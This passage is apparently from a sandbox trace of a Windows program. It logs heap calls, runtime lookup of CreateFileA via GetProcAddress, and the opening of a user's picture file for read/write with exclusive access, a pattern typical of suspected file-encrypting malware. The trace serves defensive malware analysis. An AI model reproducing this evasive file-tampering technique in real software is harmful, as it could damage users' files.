Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0041.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0041.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.087] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.089] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889ac0 [0041.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889ac0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.090] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0041.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ac0 [0041.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889ac0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0041.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.090] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0041.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0041.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0041.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d) returned 0x7ab260 [0041.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg", cchWideChar=61, lpMultiByteStr=0x7ab260, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg", lpUsedDefaultChar=0x0) returned 61 [0041.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.092] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\jn9u.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=61, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7a) returned 0x7d5bb8 [0041.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=61, lpWideCharStr=0x7d5bb8, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg") returned 61 [0041.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0041.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0041.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.094] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 